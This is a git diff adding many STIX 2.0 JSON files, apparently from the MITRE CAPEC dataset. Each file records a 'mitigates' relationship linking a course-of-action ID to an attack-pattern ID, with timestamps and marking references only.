"identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c", + "target_ref": "attack-pattern--21bfa3d5-3aa2-450e-bbe4-5bf8f49e3c2f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a430a05b-fd21-408e-9e44-d91dbf00b0f9.json b/capec/relationship/relationship--a430a05b-fd21-408e-9e44-d91dbf00b0f9.json new file mode 100644 index 0000000000..30bc8d7390 --- /dev/null +++ b/capec/relationship/relationship--a430a05b-fd21-408e-9e44-d91dbf00b0f9.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--04a3c223-792c-4146-8f06-25302be6b1d0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a430a05b-fd21-408e-9e44-d91dbf00b0f9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bd93a4f0-efc9-4872-b258-f5ab4f5e1279", + "target_ref": "attack-pattern--633f7dbb-7575-4fb9-b950-76152580d5d3", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a443ace7-3d84-46bd-8fb0-ce9c208edef9.json b/capec/relationship/relationship--a443ace7-3d84-46bd-8fb0-ce9c208edef9.json new file mode 100644 index 0000000000..4f77b65f9b --- /dev/null +++ b/capec/relationship/relationship--a443ace7-3d84-46bd-8fb0-ce9c208edef9.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7be2ca60-316c-4f6a-bdbc-fd2243be34e3", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a443ace7-3d84-46bd-8fb0-ce9c208edef9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7052d162-d901-485b-9a23-2eee96a9717f", + "target_ref": "attack-pattern--0a4d7993-b6a5-4102-8789-1e20cf34f3a9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a459d059-1af8-49fa-b08d-8a57a8d1be8c.json b/capec/relationship/relationship--a459d059-1af8-49fa-b08d-8a57a8d1be8c.json new file mode 100644 index 0000000000..8b904ba31e --- /dev/null +++ b/capec/relationship/relationship--a459d059-1af8-49fa-b08d-8a57a8d1be8c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0c816fcb-b85b-489e-a794-29b873e04952", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a459d059-1af8-49fa-b08d-8a57a8d1be8c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f333309-dde8-4d92-b47c-92de9653c262", + "target_ref": "attack-pattern--4a2bd25a-02bc-4716-86e7-6ea7494b9c82", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a4607e08-74ba-474f-84b1-b14053c9c7fa.json b/capec/relationship/relationship--a4607e08-74ba-474f-84b1-b14053c9c7fa.json new file mode 100644 index 0000000000..ae33e3bcc5 --- /dev/null +++ b/capec/relationship/relationship--a4607e08-74ba-474f-84b1-b14053c9c7fa.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b0ebfe54-8723-4423-9060-9ed22f3dcf66", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a4607e08-74ba-474f-84b1-b14053c9c7fa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--06ab084b-21a7-425f-8046-f2bcdb3d5d69", + "target_ref": "attack-pattern--df29ca69-24a5-4e56-b7f6-a32ea3af697d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a4a643b5-7a39-4bf8-ab5c-d768adc88b0c.json b/capec/relationship/relationship--a4a643b5-7a39-4bf8-ab5c-d768adc88b0c.json new file mode 100644 index 0000000000..b858de22a6 --- /dev/null +++ b/capec/relationship/relationship--a4a643b5-7a39-4bf8-ab5c-d768adc88b0c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a5fd412f-6866-45ff-9545-28b07412b917", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a4a643b5-7a39-4bf8-ab5c-d768adc88b0c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bda50c13-a4a7-473b-a32c-613afa2eafce", + "target_ref": "attack-pattern--7afbfdbc-8262-48b9-b349-cc7888fc880f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a4ace4df-6367-4a85-b7a9-d39c0066ff3b.json b/capec/relationship/relationship--a4ace4df-6367-4a85-b7a9-d39c0066ff3b.json new file mode 100644 index 0000000000..2eecd1388b --- /dev/null +++ b/capec/relationship/relationship--a4ace4df-6367-4a85-b7a9-d39c0066ff3b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--35ef2243-2c5b-4e1f-a9d1-37380d7e3538", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a4ace4df-6367-4a85-b7a9-d39c0066ff3b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8c55bb21-fa6d-4bdf-9dbd-81e34afc0728", + "target_ref": "attack-pattern--1d2043e7-db0e-45a8-ac46-a8403c5127a4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a5cd32a1-ba17-4566-8c53-384cfcfd19bd.json b/capec/relationship/relationship--a5cd32a1-ba17-4566-8c53-384cfcfd19bd.json new file mode 100644 index 0000000000..b9bd986125 --- /dev/null +++ b/capec/relationship/relationship--a5cd32a1-ba17-4566-8c53-384cfcfd19bd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f22c51da-ae0a-43ed-b251-3f94ea2a3c80", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a5cd32a1-ba17-4566-8c53-384cfcfd19bd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1950e4b9-d4fc-491a-a4cd-040c485933bf", + "target_ref": "attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a5feef4d-dd12-465c-a1f4-54a66811f051.json b/capec/relationship/relationship--a5feef4d-dd12-465c-a1f4-54a66811f051.json new file mode 100644 index 0000000000..d57eb4751b --- /dev/null +++ b/capec/relationship/relationship--a5feef4d-dd12-465c-a1f4-54a66811f051.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4246510a-98e5-4834-a25a-d1b85f4217b5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a5feef4d-dd12-465c-a1f4-54a66811f051", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--21ed7193-3366-410a-8a54-f78088f80cca", + "target_ref": "attack-pattern--391db10c-8a3c-4887-8a83-f965edc5099d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a62a21f8-c485-4c1e-9f87-9b46d915c0cd.json b/capec/relationship/relationship--a62a21f8-c485-4c1e-9f87-9b46d915c0cd.json new file mode 100644 index 0000000000..89cbfe2d15 --- /dev/null +++ b/capec/relationship/relationship--a62a21f8-c485-4c1e-9f87-9b46d915c0cd.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1f7f24a3-9cad-4485-b23a-50067d16e60d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a62a21f8-c485-4c1e-9f87-9b46d915c0cd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5", + "target_ref": "attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a650e22c-56f2-45a6-b7a0-902313c33b44.json b/capec/relationship/relationship--a650e22c-56f2-45a6-b7a0-902313c33b44.json new file mode 100644 index 0000000000..819bfe2774 --- /dev/null +++ b/capec/relationship/relationship--a650e22c-56f2-45a6-b7a0-902313c33b44.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--e29ca249-b38e-4eb8-9f1b-f8164f05c75c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a650e22c-56f2-45a6-b7a0-902313c33b44", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3c6953bd-ae60-4f04-96f3-3baa4a49cceb", + "target_ref": "attack-pattern--6d245dc1-418f-45a5-ba1d-33c45ef0b20f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a68920c3-bc51-419d-aeab-76c0de9d2e7a.json b/capec/relationship/relationship--a68920c3-bc51-419d-aeab-76c0de9d2e7a.json new file mode 100644 index 0000000000..d0355c4104 --- /dev/null +++ b/capec/relationship/relationship--a68920c3-bc51-419d-aeab-76c0de9d2e7a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--5bdd999f-c30f-47f9-b238-eb3e030f1c6f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a68920c3-bc51-419d-aeab-76c0de9d2e7a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--375c2715-0a0f-4d58-bbf6-e79d12e250f5", + "target_ref": "attack-pattern--6c510676-03ad-4a8e-835b-f2caea51b785", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a68fcccc-ef4a-49a1-8f59-93d8dd7805f1.json b/capec/relationship/relationship--a68fcccc-ef4a-49a1-8f59-93d8dd7805f1.json new file mode 100644 index 0000000000..19183e5b38 --- /dev/null +++ b/capec/relationship/relationship--a68fcccc-ef4a-49a1-8f59-93d8dd7805f1.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--94430044-54c9-4a8a-8103-2a97163c0676", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a68fcccc-ef4a-49a1-8f59-93d8dd7805f1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf", + "target_ref": "attack-pattern--03947e14-b3b5-4838-823c-0af6f255c25a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a6a06b65-e7de-417e-bd2a-4f4956c21f02.json b/capec/relationship/relationship--a6a06b65-e7de-417e-bd2a-4f4956c21f02.json new file mode 100644 index 0000000000..de4ec1b92e --- /dev/null +++ b/capec/relationship/relationship--a6a06b65-e7de-417e-bd2a-4f4956c21f02.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--20f4173a-e0a6-48a0-9a41-b09587e8d2d2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a6a06b65-e7de-417e-bd2a-4f4956c21f02", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7c98cc13-b10a-43d2-8163-429d75b5f71b", + "target_ref": "attack-pattern--7a4fd69c-ba2e-4a7a-b5df-455180c33ce8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a7601573-6a34-404f-a4fa-bd61bafa7224.json b/capec/relationship/relationship--a7601573-6a34-404f-a4fa-bd61bafa7224.json new file mode 100644 index 0000000000..f4266e0dfe --- /dev/null +++ b/capec/relationship/relationship--a7601573-6a34-404f-a4fa-bd61bafa7224.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--db45474e-eb70-4c4a-9b56-70c49d2c2273", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a7601573-6a34-404f-a4fa-bd61bafa7224", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111", + "target_ref": "attack-pattern--67562799-2d10-4e76-b3da-649c6d844340", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a76c2831-eff2-476f-8559-da6ccb5ff01a.json b/capec/relationship/relationship--a76c2831-eff2-476f-8559-da6ccb5ff01a.json new file mode 100644 index 0000000000..ae30a13f8b --- /dev/null +++ b/capec/relationship/relationship--a76c2831-eff2-476f-8559-da6ccb5ff01a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8e27f073-620f-4f8e-bd30-3e60e0f1cb16", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a76c2831-eff2-476f-8559-da6ccb5ff01a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--26e81028-3a75-4321-94a2-71630c84ef29", + "target_ref": "attack-pattern--7c728533-b33c-4c10-b191-0f476ef9a375", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a7bf4756-6477-4cdc-bbc6-bacb52b3df40.json b/capec/relationship/relationship--a7bf4756-6477-4cdc-bbc6-bacb52b3df40.json new file mode 100644 index 0000000000..9acf899644 --- /dev/null +++ b/capec/relationship/relationship--a7bf4756-6477-4cdc-bbc6-bacb52b3df40.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4116900e-85df-4f9d-ac25-53205a7a9f7a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a7bf4756-6477-4cdc-bbc6-bacb52b3df40", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6c587fe5-89a0-42b2-a2ff-ef9b15773cf7", + "target_ref": "attack-pattern--285f4e6f-6fa1-4005-989a-2b1e86e8f1e9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a8321ce6-7aa9-4ff1-b278-0b9fbd962b91.json b/capec/relationship/relationship--a8321ce6-7aa9-4ff1-b278-0b9fbd962b91.json new file mode 100644 index 0000000000..8d26286c3d --- /dev/null +++ b/capec/relationship/relationship--a8321ce6-7aa9-4ff1-b278-0b9fbd962b91.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f39c7025-5535-44df-a12c-15db4614dfe8", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a8321ce6-7aa9-4ff1-b278-0b9fbd962b91", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--13b80a43-a746-4d74-af3f-22e3e8109106", + "target_ref": "attack-pattern--65ca02d7-25ef-4ed4-accb-5d7c149868f4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a84d6185-2db4-497a-9695-e47d54880e22.json b/capec/relationship/relationship--a84d6185-2db4-497a-9695-e47d54880e22.json new file mode 100644 index 0000000000..0905d7a07e --- /dev/null +++ b/capec/relationship/relationship--a84d6185-2db4-497a-9695-e47d54880e22.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--65e42bc1-760c-4109-8432-9c3308411307", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a84d6185-2db4-497a-9695-e47d54880e22", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--7be03f8e-bbcc-49da-aec1-39a01323166c", + "target_ref": "attack-pattern--bddad79c-d5bb-431e-96f2-7c5db95e1132", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a8538d8c-fff5-4de4-a592-413face454fa.json b/capec/relationship/relationship--a8538d8c-fff5-4de4-a592-413face454fa.json new file mode 100644 index 0000000000..23eacd13e1 --- /dev/null +++ b/capec/relationship/relationship--a8538d8c-fff5-4de4-a592-413face454fa.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4ae17769-5e4b-44ac-91b6-aa28213f3d0f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a8538d8c-fff5-4de4-a592-413face454fa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--69bb2312-f52f-4ff7-b491-a28d010c2c31", + "target_ref": "attack-pattern--2bd9317a-65b9-4684-be47-ea3f173f47ff", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a8577b37-fca4-43f3-a947-a0e9a81ff263.json b/capec/relationship/relationship--a8577b37-fca4-43f3-a947-a0e9a81ff263.json new file mode 100644 index 0000000000..f458a4aff9 --- /dev/null +++ b/capec/relationship/relationship--a8577b37-fca4-43f3-a947-a0e9a81ff263.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f5f218a6-c3e2-4b8a-9797-bcd868e0425a", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a8577b37-fca4-43f3-a947-a0e9a81ff263", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--693a597c-3229-4a11-88ac-65d2ef0005c0", + "target_ref": "attack-pattern--21a2d614-a94e-4e3a-bcf3-3a4b20ecb2cb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a8bb5bce-434d-461f-812c-eb23c148b075.json b/capec/relationship/relationship--a8bb5bce-434d-461f-812c-eb23c148b075.json new file mode 100644 index 0000000000..6dd79007b6 --- /dev/null +++ b/capec/relationship/relationship--a8bb5bce-434d-461f-812c-eb23c148b075.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c2d27115-9adf-485a-96fb-18bf78cc8fb5", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a8bb5bce-434d-461f-812c-eb23c148b075", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bebb6871-c5ea-4a91-a0b0-2abbe9ed48dd", + "target_ref": "attack-pattern--63de6ee3-ed27-40ce-a1b8-ac71baa01538", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a99a314c-2ec0-4a3e-b1cc-c03761a4577a.json b/capec/relationship/relationship--a99a314c-2ec0-4a3e-b1cc-c03761a4577a.json new file mode 100644 index 0000000000..859d67dd7f --- /dev/null +++ b/capec/relationship/relationship--a99a314c-2ec0-4a3e-b1cc-c03761a4577a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--0248e8a6-970f-4d96-958c-b53f6553759b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a99a314c-2ec0-4a3e-b1cc-c03761a4577a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1e30abe4-e169-4463-9f57-4d9a61918f7a", + "target_ref": "attack-pattern--b31704a3-c801-44d0-b683-3e8c9cb054c2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a9aeaf08-5aba-42dd-91d1-bcc39d45f830.json b/capec/relationship/relationship--a9aeaf08-5aba-42dd-91d1-bcc39d45f830.json new file mode 100644 index 0000000000..e392592181 --- /dev/null +++ b/capec/relationship/relationship--a9aeaf08-5aba-42dd-91d1-bcc39d45f830.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--15eefebb-ee62-4091-8293-33e02aae1285", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a9aeaf08-5aba-42dd-91d1-bcc39d45f830", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ebc1b6cd-e87f-4baa-90e5-dd9eb0318070", + "target_ref": "attack-pattern--74014925-3a6e-48f7-b7ad-fde08bafdf19", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a9b907b4-52c2-42f8-a7ba-52b608c41cdc.json b/capec/relationship/relationship--a9b907b4-52c2-42f8-a7ba-52b608c41cdc.json new file mode 100644 index 0000000000..f66714c179 --- /dev/null +++ b/capec/relationship/relationship--a9b907b4-52c2-42f8-a7ba-52b608c41cdc.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--189de14f-f38a-4d86-bfd1-91f8cde396cc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a9b907b4-52c2-42f8-a7ba-52b608c41cdc", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--dc1128bf-f2b2-46b5-90f6-fffd43578221", + "target_ref": "attack-pattern--e4a2e6c2-39c4-4441-9343-bae3b026ccd4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a9ddebe0-1aaa-4113-b4af-d3be1bb746d0.json b/capec/relationship/relationship--a9ddebe0-1aaa-4113-b4af-d3be1bb746d0.json new file mode 100644 index 0000000000..5846721b57 --- /dev/null +++ b/capec/relationship/relationship--a9ddebe0-1aaa-4113-b4af-d3be1bb746d0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--91abbfc9-8351-4897-9ece-9437c4694982", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a9ddebe0-1aaa-4113-b4af-d3be1bb746d0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--60e5864c-2b6e-4ac0-8bdd-82ecc4047c38", + "target_ref": "attack-pattern--16b1ed32-9de4-4d9a-aeda-760985551d69", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--a9ebb372-0dce-4558-9cb8-ea6454d9b79b.json b/capec/relationship/relationship--a9ebb372-0dce-4558-9cb8-ea6454d9b79b.json new file mode 100644 index 0000000000..390bd0e2f7 --- /dev/null +++ b/capec/relationship/relationship--a9ebb372-0dce-4558-9cb8-ea6454d9b79b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--99794235-0f34-49e5-99be-28de81020b7d", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--a9ebb372-0dce-4558-9cb8-ea6454d9b79b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--6f996c4c-d4ef-471a-9766-e81b471238e4", + "target_ref": "attack-pattern--6ae118bd-2893-4883-aa2c-f1721143de1f", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--aa7d6d83-e79a-4a8d-a59e-f3592ca65b89.json b/capec/relationship/relationship--aa7d6d83-e79a-4a8d-a59e-f3592ca65b89.json new file mode 100644 index 0000000000..07d48edb53 --- /dev/null +++ b/capec/relationship/relationship--aa7d6d83-e79a-4a8d-a59e-f3592ca65b89.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7c3bb4e8-5e50-423f-8bf5-39eb263b614c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--aa7d6d83-e79a-4a8d-a59e-f3592ca65b89", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--fbbbe648-4118-4aff-b5b8-3c4744108d6a", + "target_ref": "attack-pattern--cd11d31a-89f2-47d8-862f-aed22baed21a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--aa8b1d29-f699-40ae-ae85-528d22562479.json b/capec/relationship/relationship--aa8b1d29-f699-40ae-ae85-528d22562479.json new file mode 100644 index 0000000000..88d9d4339f --- /dev/null +++ b/capec/relationship/relationship--aa8b1d29-f699-40ae-ae85-528d22562479.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": 